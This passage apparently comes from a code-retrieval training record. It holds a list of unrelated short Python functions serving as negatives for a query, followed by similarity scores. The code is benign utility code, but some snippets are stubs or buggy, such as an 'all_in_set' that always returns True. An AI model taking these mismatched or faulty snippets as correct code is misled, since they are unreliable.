%(removed,plural_or_not(removed)))\r\n return ret", "def permute(p,l,length):\n assert length >= 0\n if length == 0:\n\tprint p\n\treturn\n\n for i in range(0,length):\n\tn = p + (l[i],) \n\tpermute(n,l[0:i]+l[i+1:],length-1)", "def incrucisare_genetica(parinte1: str, parinte2: str):\n index_ruptura = random.randint(2, 26)\n copil1 = parinte1[0:index_ruptura] + parinte2[index_ruptura:]\n copil2 = parinte2[0:index_ruptura] + parinte1[index_ruptura:]\n pozitii_duplicate_copil1 = determina_duplicate_copil(copil1, index_ruptura)\n pozitii_duplicate_copil2 = determina_duplicate_copil(copil2, index_ruptura)\n if len(pozitii_duplicate_copil1) > 0:\n lista_copil1 = [litera for litera in copil1]\n lista_copil2 = [litera for litera in copil2]\n for i in range(0, len(pozitii_duplicate_copil1)):\n lista_copil1[pozitii_duplicate_copil1[i]], lista_copil2[\n pozitii_duplicate_copil2[i]] = lista_copil2[\n pozitii_duplicate_copil2[\n i]], \\\n lista_copil1[\n pozitii_duplicate_copil1[\n i]]\n\n copil1 = \"\"\n copil2 = \"\"\n for i in range(0, len(lista_copil1)):\n copil1 += lista_copil1[i]\n copil2 += lista_copil2[i]\n return copil1, copil2", "def fill_list(preference_list, name_set):\n l = [preference_list[0]]\n names = name_set.copy()\n for name in preference_list[1:]:\n # Remove duplicates as well\n if name not in l:\n l.append(name)\n # This check is needed so people who put the same person twice don't throw an error\n if name in names:\n names.remove(name)\n l.extend(sorted(list(names)))\n return l", "def potential_new_obs(self) -> Iterable[GriddedPerm]:", "def unused(permutation, nb_elements):\n return tuple(set(range(nb_elements)) - set(permutation))", "def unique(list_of_links):\n return list(set(list_of_links))", "def unique(list1):\n # insert the list to the set\n list_set = set(list1)\n # convert the set to the list\n unique_list = (list(list_set))\n for x in unique_list:\n return(x,)", "def setListRandomFromList(ldata, ldataRepl):\n\tl = len(ldata)\n\tselSet = set()\n\tfor d in ldataRepl:\n\t\ti = randint(0, l-1)\n\t\twhile i in selSet:\n\t\t\ti = randint(0, l-1)\n\t\tldata[i] = d\n\t\tselSet.add(i)", "def unique_list2(mylist):\n\n newlist = []\n for num in mylist:\n if num not in newlist:\n newlist.append(num)\n print(newlist)", "def test_list_identity(self):\n pass", "def exercise_b2_2():\r\n letters = ['a', 'e', 'i', 'o', 'u', 'u']\r\n combinations = list(permutations(letters))\r\n uniq_combinations = set(combinations)\r\n total_possibilities = len(combinations)\r\n total_uniq_possibilities = len(uniq_combinations)\r\n print(\"\\nThere are %s possible combinations and %s unique combinations for this set\\n\" \r\n % (total_possibilities, total_uniq_possibilities))\r\n return", "def permutation(lst):\n if(len(lst)==0):\n return []\n \n \"\"\"If there is only one item in the list then there is\n only one possible permutation\"\"\"\n if(len(lst)==1):\n return [lst]\n \n \"\"\"More than one item in the list\"\"\"\n \n \"\"\"Empty list that we will store the current perm in\"\"\"\n l = []\n \n \"\"\"Iterate through the input list and calculate the perms\"\"\"\n for i in range(len(lst)):\n m = lst[i]\n \n \"\"\"Extract m=lst[i] from the list and deal with \n the remaining list portion\"\"\"\n remlst = lst[:i] + lst[i+1:]\n \n \"\"\"Generate all permutations where m is the first element\"\"\"\n for p in permutation(remlst):\n l.append([m]+p)\n\n return l", "def potentials(self, potential_list):\n for item in potential_list:\n item.store()\n potential_list_uuids = [item.uuid for item in 
potential_list]\n self.set_attribute('potentials', potential_list_uuids)", "def generateCandidates(self):\n\t\tprint(\"Candidate list:\\n\")\n\t\tkeys = list(self.prune_list.keys())\n\t\ttuple_count = len(keys[0])\n\t\tprune_list = {}\n\t\ttup = []\n\t\tfor v in comb(keys, 2):\n\t\t\ta = set(v[0])\n\t\t\tb = set(v[1])\n\t\t\t\n\t\t\t# If there's as many common element in a & b as one less than tuple_count\n\t\t\tif((len(a & b) == (tuple_count - 1)) and (tuple(a | b) not in tup)):\n\t\t\t\ttup.append(tuple(a | b))\n\t\t\t\tprint(tup[-1])\n\t\t\t\t# Update prune list\n\t\t\t\tcount = self.getSupport(tup[-1])\n\t\t\t\tif(count >= self.support):\n\t\t\t\t\tprune_list[tup[-1]] = count\n\t\treturn prune_list", "def deduped(items):\n \n return list(set(items))", "def fn(i):\n if i == len(nums): ans.append(nums.copy())\n seen = set()\n for k in range(i, len(nums)):\n if nums[k] not in seen:\n seen.add(nums[k])\n nums[i], nums[k] = nums[k], nums[i]\n fn(i+1)\n nums[i], nums[k] = nums[k], nums[i]", "def copy_list(self,list_):\r\n return list_[:]", "def updateEmpleadosLista(name,venta): #Esta sección fue hecha por Valeria\n index = 0\n for register in venta:\n if name in register:\n venta[index] [1] += 1\n index += 1\n return venta", "def unique(li):\r\n seen = set()\r\n seen_add = seen.add\r\n return [x for x in li if not (x in seen or seen_add(x))]", "def __scatterRepeated ( self, posList ):\n\n #-- 1 --\n # [ numNonReps := len(self.posSpecs) - 1\n # numReps := len(posList) - (len(self.posSpecs) - 1) ]\n # NB: numNonReps is the total number of non-repeating required\n # arguments, and numReps is the number of positionals from posList\n # that correspond to the repeated argument.\n numNonReps = len(self.posSpecs) - 1\n numReps = len(posList) - numNonReps\n\n #-- 2 --\n # [ if numReps < 0 ->\n # sys.stderr +:= (usage message) + (error message)\n # stop execution\n # else -> I ]\n if numReps < 0:\n usage ( self.switchSpecs, self.posSpecs,\n \"Only %d positional arguments were supplied, \"\n \"need at least %d.\" %\n ( len(posList), len(self.posSpecs) - 1 ) )\n\n #-- 3 --\n # [ self.posMap +:= entries mapping keys of\n # self.posSpecs[0:self.__repx] |-> poslist[0:self.__repx] ]\n for posx in range ( self.__repx ):\n self.posMap[self.posSpecs[posx].key] = posList[posx]\n\n #-- 4 --\n # [ self.posMap +:= an entry mapping the key of\n # self.posSpecs[self.__repx].key |-> the list\n # posList[self.__repx:self__repx+numReps] ]\n self.posMap[self.posSpecs[self.__repx].key] = (\n posList[self.__repx:self.__repx+numReps] )\n\n #-- 5 --\n # [ self.posMap +:= entries mapping keys of\n # self.posSpecs[self.__repx+1:] |->\n # posList[self.__repx+numReps:] ]\n for spex in range ( self.__repx+1, len(self.posSpecs)):\n sourcex = spex - 1 + numReps\n self.posMap[self.posSpecs[spex].key] = posList[sourcex]", "def part_2():\n return itertools.permutations(range(5, 10))", "def getMutation(AA,Codon):\r\n temp_mutationlist = []\r\n '''create a list of possible triplets within hamming distance 1 '''\r\n for item in INI.genetic_code.keys():\r\n isvalid = INI.isvalidtriplet(item,Codon)\r\n ''' Hamming distance 1, AA is not equal to the given AA,forbid mutation to stopcodon '''\r\n if (isvalid == True and AA !=INI.genetic_code[item] and INI.genetic_code[item]!=\"*\"):\r\n temp_mutationlist.append(item)\r\n \r\n \r\n aalist = []\r\n # generate a list of all possible amino acids resulting from the temp_mutationlist \r\n for item in temp_mutationlist:\r\n if (item in INI.genetic_code):\r\n 
aalist.append(INI.genetic_code[item])\r\n else:\r\n aalist.append(\"n\")\r\n \r\n return(temp_mutationlist,aalist)", "def representative_combos(list_1: list[str], list_2: list[str]) -> list[tuple[str, str]]:\n all_selected_combinations: list[tuple[str, str]] = []\n for i in range(max(len(list_1), len(list_2))):\n all_selected_combinations.append((list_1[i % len(list_1)], list_2[i % len(list_2)]))\n return all_selected_combinations", "def checkLists(self):\n self.x = self.checkList(self.x)\n self.y = self.checkList(self.y)\n return", "def all_in_set(the_set, the_list):\n return True", "def powerset(lst):\n return reduce(lambda rslt, x: rslt + [subset + [x] for subset in rslt],\n lst, [[]])" ]
[ "0.6468891", "0.636794", "0.62925", "0.6233623", "0.61992514", "0.6176376", "0.61639607", "0.6095989", "0.60220444", "0.5991031", "0.59071577", "0.58907956", "0.5854479", "0.5828909", "0.57634", "0.57418424", "0.57263476", "0.5719343", "0.5716875", "0.56898516", "0.56706095", "0.5669724", "0.5662266", "0.56273204", "0.5618664", "0.5614173", "0.5610244", "0.56052774", "0.5593584", "0.5573937", "0.55644214", "0.556361", "0.556273", "0.5562136", "0.55557454", "0.5553421", "0.5550209", "0.5542105", "0.55398875", "0.55380183", "0.5531014", "0.55301183", "0.55228966", "0.5480295", "0.54699504", "0.54577416", "0.5457382", "0.54545283", "0.5449773", "0.5439458", "0.54351586", "0.54217285", "0.5420119", "0.54157037", "0.5411821", "0.54081815", "0.54066604", "0.5390568", "0.5384541", "0.53834456", "0.53776723", "0.5376677", "0.5374945", "0.53631085", "0.53600717", "0.5358929", "0.53561157", "0.5352538", "0.5347334", "0.53443", "0.5328414", "0.53216684", "0.5318973", "0.53159356", "0.5309738", "0.5296073", "0.52956325", "0.52923983", "0.5285092", "0.5283161", "0.5276535", "0.5276187", "0.52709824", "0.52560157", "0.52537334", "0.5252813", "0.5246771", "0.52436495", "0.5242382", "0.5241101", "0.5236979", "0.523207", "0.522601", "0.522126", "0.5220646", "0.52099967", "0.52068967", "0.52060264", "0.5199364", "0.51967657", "0.5195924" ]
0.0
-1
Find a zero of the function f between the points a and b, where f takes opposite signs. The optional parameter toll specifies the precision to which the value of the zero is computed
def bisezione(f, a, b, toll=10**-5):
    m = (a+b)/2
    f_m = f(m)
    while abs(f_m) > toll:
        if f(a)*f_m < 0:
            b = m
        elif f(b)*f_m < 0:
            a = m
        elif f_m == 0:
            print("Exact solution found")
            return m
        else:
            print("Method failed")
            return None
        m = (a+b)/2
        f_m = f(m)
    return m
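A minimal usage sketch (illustrative, not part of the original dataset row), assuming the bisezione definition above: it approximates sqrt(2) as the zero of f(x) = x**2 - 2 on [1, 2], an interval on which f changes sign since f(1) = -1 and f(2) = 2.

root = bisezione(lambda x: x**2 - 2, 1, 2, toll=1e-8)
print(root)  # ~1.4142135..., with |f(root)| <= 1e-8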
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Calcular(a: float) ->float:\n \n return (a*2)", "def p() -> float:\n return 0.9", "def f(x0: float, x1: float) -> float:\n return 8 - (x0 - 2) ** 2 - (x1 - 2) ** 2", "def p2f (p):\n #return 11000**((p+1)/2)\n #return (p+1)*11000\n return (p+1)*5500", "def p2f(self):\n\n stale = self.m_f\n self.m_f = self.v.b / self.m_v", "def _correct_p(self, f0, f1):\n return self.p * np.exp(self.dbeta * (f0 + f1) / 2)", "def f1(x, a, b):\n #return x**43 - b*x**42 + x**7 - x**6 * a + 84*x - 42 * b - 42 * a\n return (x**42 + 42)/(x-a) + (x**6 + 42)/(x-b)", "def erfc(x):\n return 0.0", "def f2b(self, fres, f):\n return f / fres", "def biseccion(func, a, b, tol=1e-4):\n p = (a + b) / 2 \n while np.fabs(func(p)) > tol:\n p = (a + b) / 2 \n if func(a) * func(p) < 0:\n b = p\n elif func(a) * func(p) > 0:\n a = p\n else:\n return p\n return p", "def sf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n if x < 0:\n return mp.one\n if x > 1:\n return mp.zero\n return mp.betainc(a, b, x1=x, x2=1, regularized=True)", "def RegulaFalsiMethod(f, a=0.0, b=0.75, tol=1e-10):\n\tstart = time()\n\tf_a = f(a)\n\tf_b = f(b)\n\terror = tol + 1\n\t\n\terrs = []\n\ti = 0\n\n\twhile error > tol:\n\t\tx = (a*f_b - b*f_a) / (f_b - f_a)\n\t\tf_x = f(x)\n\n\t\terrs.append(error)\n\n\t\tif f_a*f_x > 0:\n\t\t\ta = x\n\t\t\tf_a = f_x\n\t\telif f_b*f_x > 0:\n\t\t\tb = x\n\t\t\tf_b = f_x\n\t\telse:\n\t\t\tbreak\n\n\t\terror = np.abs(f_x)\n\t\ti = i+1\n\tend = time()\n\treturn x, (end-start), i", "def f2p (f):\n #return 2*math.log(f, 11000) - 1\n #return f/11000 - 1\n return f/5500 - 1", "def _compute_f1(self, tp: torch.Tensor, fp: torch.Tensor,\n fn: torch.Tensor) -> float:\n precision = tp / (tp + fp).clamp(min=1e-8)\n recall = tp / (tp + fn).clamp(min=1e-8)\n f1 = 2 * precision * recall / (precision + recall).clamp(min=1e-8)\n return float(f1.mean())", "def F(self, t, x, **params):\n return 0.*x", "def b(q):\n if q == 0 or q == 1:\n return float(0.0)\n return -(q * log2(q) + (1 - q) * log2(1 - q))", "def f(self,un,tn):\n return -self.a(tn)*un + self.b(tn)", "def erf(x):\n return 0.0", "def F0(t):\n if (t < 1e-6):\n return 1.0 - t / 3.0\n else:\n return 0.5 * (np.pi / t) ** 0.5 * sp.erf(t ** 0.5)", "def calc_f1(precision: float, recall: float) -> float:\r\n return 2 * (precision * recall) / (precision + recall)", "def ft(t):\r\n ft = t ** (1.0 / 3.0) if t > 0.008856 else 7.787 * t + 4 / 29\r\n return ft", "def calculate_automation(f, t):\n return round(5 * f * t)", "def f0(E, fermi, T):\n return 1. / (1. 
+ np.exp((E - fermi) / (k_B * T)))", "def ifrft(f, a):\n return frft(f, -a)", "def fla (mva, vnom):\r\n x=mva*1000000\r\n y=(vnom*1000)\r\n z=round(x/y,3)\r\n return z", "def fppp(x):\n return (-2000.00*math.cos(10.0.x+1))", "def c2f(t):\r\n return round(9*t/5 + 32)", "def f_value(a, b):\r\n if not any(a) or not any(b) or len(a) <= 1 or len(b) <= 1:\r\n raise ValueError(\"Vectors should contain more than 1 element\")\r\n F = var(a) / var(b)\r\n dfn = len(a) - 1\r\n dfd = len(b) - 1\r\n return dfn, dfd, F", "def f(a):\n b = a * 2\n while b.norm().asscalar() < 1000:\n b = b * 2\n if b.sum().asscalar() > 0:\n c = b\n else:\n c = 100 * b\n return c", "def BisectionMethod(f, a=0, b=1, tol=1e-10):\n\tstart = time()\n\tf_a = f(a)\n\tf_b = f(b)\n\t\n\t# Initialization of errors and iters\n\terrs = []\n\ti = 0\n\n\tif f_a == 0:\n\t\treturn a\n\telif f_b == 0:\n\t\treturn b\n\telif f_a*f_b > 0:\n\t\tprint(\"The function values have the same sign!\")\n\telse:\n\t\terror = b-a\n\t\twhile error > tol:\n\t\t\tc = (b+a)/2\n\t\t\tf_c = f(c)\n\t\t\t\n\t\t\terrs.append(error)\n\t\t\t\n\t\t\tif f_a*f_c > 0:\n\t\t\t\ta = c\n\t\t\t\tf_a = f_c\n\t\t\telif f_a*f_c < 0:\n\t\t\t\tb = c\n\t\t\t\tf_b = f_c\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\terror = b-a\n\t\t\ti = i+1\n\tend = time()\n\treturn c, (end-start), i", "def ftom(f):\n return 69 + 12 * log(f / 440.0, 2)", "def ret_f(t,y):\n\n f = np.zeros(3)\n f[0] = 77.27*(y(1) - y(0)*y(1)+ y(0)-8.375e-6*y(0)*y(0))\n f[1] = (1.0/77.27)*(-y(1)-y(0)*y(1)+y(2))\n f[2] = 0.161*(y(0)-y(2))\n\n return f", "def bisection(f,a,b,tol=1e-4,Max_trial=14):\n pvalues = np.zeros(Max_trial+3)\n fvalues = np.zeros(Max_trial+3)\n fa,fb = f(a),f(b)\n pvalues[0],pvalues[1]=a,b\n fvalues[0],fvalues[1]=fa,fb\n\n if fa*fb>0:\n print('f(a)*f(b)>0 ---> specified a and b do not work!')\n print('spiting out a or b --- whichever is closer')\n \n if np.abs(fa)<=fb:\n return a,f(a)\n else:\n return b,f(b)\n \n \n p=(a+b)/2\n pvalues[2]=p\n fp=f(p)\n fvalues[2]=fp\n err=np.abs(fp)\n\n j=0\n while err > tol and j<Max_trial:\n\n if fa*fp<0:\n b=p\n p=(a+b)/2\n fp = f(p)\n else:\n a=p\n fa = fp\n p=(a+b)/2\n fp = f(p)\n\n err=abs(fp)\n print('-------------------------------------------------------')\n print('bisection trial #'+str(j)+': sol='+str(p)+', mismatch ='+str(err))\n print('-------------------------------------------------------')\n j=j+1\n pvalues[j+2]=p\n fvalues[j+2]=fp\n # print('p='+str(p))\n # print('a,b='+str(a)+'--'+str(b))\n\n pvalues,fvalues=pvalues[:j+3],fvalues[:j+3]\n\n return pvalues,fvalues", "def bisection(f, fu, point_a, point_b, point_c, point_d, lower_bound, upper_bound, length):\n n = 1\n theta = 0\n a = lower_bound\n b = upper_bound\n while n <= 100:\n theta = (a + b) / 2.0\n if -1e-6 < f(fu(point_a, point_b, point_c, theta), point_d) - length < 1e-6:\n # print 'Residual', f(fu(point_a, point_b, point_c, theta), point_d) - length\n # print 'iteration', n\n return theta\n else:\n n = n + 1\n if f(fu(point_a, point_b, point_c, theta), point_d) - length > 0:\n b = theta\n else:\n a = theta\n\n print 'failedtheta', theta, 'Residual', f(fu(point_a, point_b, point_c, theta), point_d) - length\n print 'iteration', n\n return False", "def find_f_equals_1():\n f1 = scipy.optimize.brentq(f2, 0, -10)\n return f1", "def fpr(self):\n return float(self.fp) / (self.fp + self.tn) if self.tn != 0 else 1", "def f(z):\n a=1./(1.+z)\n #da=0.01\n da=0.01*a\n #da=1e-7\n gp,g,gm=[D(1./ia-1.) 
for ia in [a+da,a,a-da]]\n f=a*(gp-gm)/(2*g*da)\n #dz=0.01\n #gp,g,gm=[D(zi) for zi in [z+dz,z,z-dz]]\n #f=(z)*(gp-gm)/(2.*g*dz)\n return f", "def my_func(a,b):\n return (0.+a)*b", "def frexp(x):\n return 0.0, 0", "def f(t, T=2*np.pi):\n if t==0:\n return(0)\n if 0<t<T/2:\n return(1)\n if -T/2<t<0:\n return (-1)", "def B(q):\n # print('Value q')\n # print(q)\n if q > 0 and q != 0 and q != 1:\n result = -(q*math.log(q,2) + (1-q)*math.log(1-q,2))\n else:\n result = 0\n # print('Result of B')\n # print(result)\n return result", "def test_fixed_point_system(testFunctions, tol, printFlag): \n pass", "def fmod(x, y):\n return 0.0", "def test_bonferroni_correction(self):\r\n pvals = array([.1, .7, .5, .3, .9])\r\n exp = pvals * 5.\r\n obs = bonferroni_correction(pvals)\r\n self.assertFloatEqual(obs, exp)", "def bdq1(f, x, h=1e-5):\n return (f(x)-f(x-h))/h\n raise NotImplementedError(\"Problem 2 Incomplete\")", "def f(p, phi, phib, df):\n\treturn -log(p) - df + (p-1)*phi + \\\n\t ( phi*(1-p) + phib + \\\n\t 5./4*alpha*(phi*p)**(9./4)-(9./4)*alpha*(p*phi)**(5./4) - \\\n\t (1./2)(1-p*phi)**2 - (phib/Nb)-5./4*alpha*(phi+phib)**(9./4) + \\\n\t (9./4)*alpha*(phi+phib)**(5.4) + \\\n\t 1./2*(1-phi-phib)**2 ) * Ns", "def g(f, x: float):\n return lambda x: f(x + f(x)) / f(x) - 1", "def bCheck(c, v, p, b):\n val = (v+1).floor()\n deg = c.degree()\n coeffs = c.coefficients(sparse=False)\n lcoeff = coeffs[deg]; coeffs.remove(lcoeff)\n check1 = [(coeffs[i].valuation(p) - lcoeff.valuation(p))/(deg - i) for i in range(0,len(coeffs)) if coeffs[i] != 0]\n check2 = (val - lcoeff.valuation(p))/deg\n check1.append(check2)\n bval = min(check1)\n return (bval).ceil()", "def fpp(x):\n return (-200.0*math.sin(10.0*x+1.0))", "def sigma_xx_to_a_to_ff(self, Q, f):\n if f == \"e\":\n mf = me\n # gall = self.gaee\n elif f == \"mu\":\n mf = mmu\n # gall = self.gamumu\n mx = self.mx\n if Q >= 2.0 * mf and Q >= 2.0 * mx:\n # gaxx = self.gaxx\n # ma = self.ma\n # width_a = self.width_a\n ret_val = 0.0\n assert ret_val.imag == 0\n assert ret_val.real >= 0\n return ret_val.real\n else:\n return 0.0", "def def_mpf_constant(fixed):\n def f(prec, rnd=round_fast):\n wp = prec + 20\n v = fixed(wp)\n if rnd in (round_up, round_ceiling):\n v += 1\n return normalize(0, v, -wp, bitcount(v), prec, rnd)\n f.__doc__ = fixed.__doc__\n return f", "def f(m, x, b):\n return m*x + b", "def calculate(self) -> float:", "def _fv(self):\n return self.beta * (self.x ** self.c)", "def fpb(x, y):\n if y == 0:\n return x\n else:\n return fpb(y, (x % y))", "def fdq1(f, x, h=1e-5):\n return (f(x+h) - f(x))/h\n \n raise NotImplementedError(\"Problem 2 Incomplete\")", "def fabs(x):\n return 0.0", "def calculate_precision(num_tp, num_fp, num_fn):\n if (num_tp + num_fp) == 0:\n return 1\n else:\n return num_tp / (num_tp + num_fp)", "def mtof(p):\n return 440.0 * 2 ** ((p - 69) / 12.0)", "def calc_f_g(mu, x, t, ro, inv_a):\n z = inv_a*pow(x,2)\n f = 1 - pow(x,2)/ro*stump_C(z) \n g = t - 1/sqrt(mu)*pow(x,3)*stump_S(z)\n return f, g", "def p(e, t):\n return b * e ** 2", "def f(p, phi, phib, df):\n\treturn - p + exp( - df + Ns*(log((1 - p*phi)/(1 - phi - phib)) + \\\n\t\t(p - 1)*phi - phib + (9./4)*alpha*((phi + phib)**(5./4) - (p*phi)**(5./4))))", "def vf(gravedad, tiempo):\r\n #se realiza un multiplicacion y el valor se le asigna a la variable vf\r\n vf=gravedad*tiempo\r\n #se regresa vf\r\n return vf", "def test_fixed_point(testFunctions, tol, printFlag): \n pass", "def f1(x):\n return x**3 - 2*x + 2", "def get_transfer_fee(value: float) -> float:\n return (value 
* (0.99 / 100)) + 4.9", "def calculate_ft(self):\n \n # Create a function which is able to evaluate B**2\n ffunc = scipy.interpolate.interp1d(self.psigrid, self.e.getF()[self.tind])\n def b2_func(R, Z, psi):\n bt = ffunc(psi)/R\n br = -self.psifunc.ev(R, Z, dy=1)/R\n bz = self.psifunc.ev(R, Z, dx=1)/R\n \n return bt**2 + br**2 + bz**2\n \n\n def b_bmax2(R,Z,psi):\n b2 = b2_func(R,Z,psi)\n return b2 / np.max(b2)\n \n def b_bmax(R,Z,psi):\n return np.sqrt(b_bmax2(R,Z,psi))\n \n # Evaluate the flux-surface averaged h^2 and h, as required\n fsa_h2 = self.fs_average(b_bmax2)\n fsa_h = self.fs_average(b_bmax)\n \n # This is the function which gets flux-surface averaged in equation (7)\n def ftl_func(R,Z,psi):\n h = b_bmax(R,Z,psi)\n h2 = b_bmax2(R,Z,psi)\n \n return (1 - (np.sqrt(1 - h) * (1 + 0.5 * h)))/h2\n \n \n # Equation 6, 7 in Lin-Liu\n fs_ftu = 1 - fsa_h2 / fsa_h**2 * (1 - np.sqrt(1 - fsa_h) * (1 + 0.5 * fsa_h))\n fs_ftl = 1 - fsa_h2 * self.fs_average(ftl_func)\n # Equation 18, 19 \n om = 0.75\n self.fs_ft = om*fs_ftu + (1-om)*fs_ftl", "def comp_f1(precision, recall):\n return 2. * recall * precision / (recall + precision) \\\n if (recall + precision) > 0. else 0.", "def modf(x):\n return 0.0, 0.0", "def f(self,node):\r\n return (self.a*self.nodeDegree(node))/(1+self.b*self.nodeDegree(node))", "def test_hof(a, b):\n def f(g, x):\n return g(x) * g(x + 10.0)\n\n def g(x):\n return x * b\n\n return f(g, a) + f(g, b)", "def _calc_ft(Tci, Thi, Tco, Tho, N_shells) -> 'ft':\n if (Tco - Tci)/Tco < 0.01 or (Thi-Tho)/Tho < 0.01:\n return 1\n try:\n return ht.F_LMTD_Fakheri(Thi, Tho, Tci, Tco,\n shells=N_shells)\n except ValueError:\n return 0.6 # Accounts for worst case scenario", "def getFPSA2(ChargeSA):\n temp=0.0\n for i in ChargeSA:\n temp=temp+i[2]\n if temp == 0.0:\n return 0.0\n else:\n return getPPSA2(ChargeSA)/temp", "def f(t,x,p,q):\n return p[1] + q[0]*x", "def rkf( f, a, b, x0, tol, hmax, hmin ):\n\n # Coefficients used to compute the independent variable argument of f\n\n a2 = 2.500000000000000e-01 # 1/4\n a3 = 3.750000000000000e-01 # 3/8\n a4 = 9.230769230769231e-01 # 12/13\n a5 = 1.000000000000000e+00 # 1\n a6 = 5.000000000000000e-01 # 1/2\n\n # Coefficients used to compute the dependent variable argument of f\n\n b21 = 2.500000000000000e-01 # 1/4\n b31 = 9.375000000000000e-02 # 3/32\n b32 = 2.812500000000000e-01 # 9/32\n b41 = 8.793809740555303e-01 # 1932/2197\n b42 = -3.277196176604461e+00 # -7200/2197\n b43 = 3.320892125625853e+00 # 7296/2197\n b51 = 2.032407407407407e+00 # 439/216\n b52 = -8.000000000000000e+00 # -8\n b53 = 7.173489278752436e+00 # 3680/513\n b54 = -2.058966861598441e-01 # -845/4104\n b61 = -2.962962962962963e-01 # -8/27\n b62 = 2.000000000000000e+00 # 2\n b63 = -1.381676413255361e+00 # -3544/2565\n b64 = 4.529727095516569e-01 # 1859/4104\n b65 = -2.750000000000000e-01 # -11/40\n\n # Coefficients used to compute local truncation error estimate. 
These\n # come from subtracting a 4th order RK estimate from a 5th order RK\n # estimate.\n\n r1 = 2.777777777777778e-03 # 1/360\n r3 = -2.994152046783626e-02 # -128/4275\n r4 = -2.919989367357789e-02 # -2197/75240\n r5 = 2.000000000000000e-02 # 1/50\n r6 = 3.636363636363636e-02 # 2/55\n\n # Coefficients used to compute 4th order RK estimate\n\n c1 = 1.157407407407407e-01 # 25/216\n c3 = 5.489278752436647e-01 # 1408/2565\n c4 = 5.353313840155945e-01 # 2197/4104\n c5 = -2.000000000000000e-01 # -1/5\n\n # Set t and x according to initial condition and assume that h starts\n # with a value that is as large as possible.\n \n t = a\n x = numpy.array(x0)\n h = hmax\n\n # Initialize arrays that will be returned\n\n T = numpy.array( [t] )\n X = numpy.array( [x] )\n \n while t < b:\n\n # Adjust step size when we get to last interval\n\n if t + h > b:\n h = b - t;\n\n # Compute values needed to compute truncation error estimate and\n # the 4th order RK estimate.\n\n k1 = h * f( x, t )\n k2 = h * f( x + b21 * k1, t + a2 * h )\n k3 = h * f( x + b31 * k1 + b32 * k2, t + a3 * h )\n k4 = h * f( x + b41 * k1 + b42 * k2 + b43 * k3, t + a4 * h )\n k5 = h * f( x + b51 * k1 + b52 * k2 + b53 * k3 + b54 * k4, t + a5 * h )\n k6 = h * f( x + b61 * k1 + b62 * k2 + b63 * k3 + b64 * k4 + b65 * k5, \\\n t + a6 * h )\n\n # Compute the estimate of the local truncation error. If it's small\n # enough then we accept this step and save the 4th order estimate.\n \n r = abs( r1 * k1 + r3 * k3 + r4 * k4 + r5 * k5 + r6 * k6 ) / h\n if len( numpy.shape( r ) ) > 0:\n r = max( r )\n if r <= tol:\n t = t + h\n x = x + c1 * k1 + c3 * k3 + c4 * k4 + c5 * k5\n T = numpy.append( T, t )\n X = numpy.append( X, [x], 0 )\n\n # Now compute next step size, and make sure that it is not too big or\n # too small.\n\n h = h * min( max( 0.84 * ( tol / r )**0.25, 0.1 ), 4.0 )\n\n if h > hmax:\n h = hmax\n elif h < hmin:\n raise RuntimeError(\"Error: Could not converge to the required tolerance %e with minimum stepsize %e.\" % (tol,hmin))\n break\n # endwhile\n\n return ( T, X )", "def test_c2f():\n assert temperatura.c2f(3) == 37.4", "def u_exact(t):\n return a * t + b", "def friction_factor(v1: \"int\", v2: \"int\") -> \"int\":", "def find_zero(f, df):\n def near_zero(x):\n return approx_eq(f(x), 0)\n return improve(newton_update(f, df), near_zero)", "def compute_a(P, T14, rp, b):\n _a = P / np.pi / T14 * np.sqrt( (1+ rp)**2 - b )\n return _a", "def _fadefunc(self, t):\r\n return t * t * t * (t * (t * 6 - 15) + 10)", "def mtbf(self, up_time, failures=1, dec_point=3):\n self.up_time = up_time\n self.failures = failures\n self.dec_point = dec_point\n mt_bf = round(float(up_time / failures),dec_point)\n return mt_bf", "def calculate_f(f, s = None, f_err = None, s_err = None, scale = 1000):\n if s is None:\n return f, f_err\n else:\n f0 = f * s / gamma(1./s)\n if (f_err is not None) and (s_err is not None):\n sigma = np.sqrt(f_err ** 2 + ((s + polygamma(0, 1/s))/s/gamma(1/s)* s_err)**2)\n else:\n sigma = None\n return f0, sigma", "def f(t, v):\n dSdt = - (a * v[1] * v[0]) / N\n dUdt = (a * v[1] * v[0]) / N - c * v[1]\n dQdt = c * v[1] - b * v[2]\n dCdt = b * v[2]\n return [dSdt, dUdt, dQdt, dCdt]", "def compute_f_score(alpha, true_positves, false_positives, false_negatives):\n num = true_positves\n den = np.float64(alpha * (true_positves + false_positives) +\\\n (1 - alpha) * (true_positves + false_negatives))\n with np.errstate(divide='ignore', invalid='ignore'):\n return num / den", "def f(y):\n \n\n k = 1.0\n return y*(1-y)", "def _F(x,gam):\n 
beta = np.sqrt(1 - gam**-2)\n B = 1 + 0.5 * (gam**2 - 1)\n C = 10 * x * gam * beta * (2 + gam * beta)\n C /= 1 + x**2 * (gam**2 - 1)\n\n F_1 = (17 - 3 * x**2 / (2 - x)**2 - C) * np.sqrt(1 - x)\n F_2 = 12 * (2 -x) - 7 * x**2 / (2 - x) - 3 * x**4 / (2 - x)**3\n F_3 = np.log((1 + np.sqrt(1 - x)) / np.sqrt(x))\n\n return B * F_1 + F_2 * F_3", "def f_raw(x, a, b):\n return a * x + b", "def test_partial_derivative_f1(self):\r\n # Verified with Wolfram Alpha.\r\n\r\n # f2 > 0\r\n obs = self.estimator1._partial_derivative_f1(2, 3, 10, 42)\r\n assert_almost_equal(obs, 1.22672908818)\r\n\r\n # f2 == 0\r\n obs = self.estimator1._partial_derivative_f1(2, 0, 10, 42)\r\n assert_almost_equal(obs, 1.272173492918482)\r\n\r\n # f1 == 0, f2 == 0\r\n obs = self.estimator1._partial_derivative_f1(0, 0, 10, 42)\r\n assert_almost_equal(obs, 1.2961664362634027)", "def pi_het(dose,p,a,b,eps):\n \n small=0.001\n return((1-(quad(f_beta,0,0+small,args=(dose,p,a,b),full_output=1)[0]+quad(f_beta,0+small,1-small,args=(dose,p,a,b),full_output=1)[0]+quad(f_beta,1-small,1,args=(dose,p,a,b),full_output=1)[0]))*(1-eps))", "def calc_pr_rc_F1(GTD, block_occ):\r\n true_pos = ((GTD + block_occ)==2).sum()\r\n false_pos = sum([1 if BI_val==1 and GTD[i]==0 else 0 for i, BI_val in enumerate(block_occ.values)])\r\n precision = float(true_pos/(true_pos+false_pos))\r\n recall = float(true_pos/(GTD.sum()))\r\n if precision == 0:\r\n F1 = 0\r\n else:\r\n F1 = float(2 * (precision * recall) / (precision + recall))\r\n \r\n return precision, recall, F1", "def romberg(f, a, b, 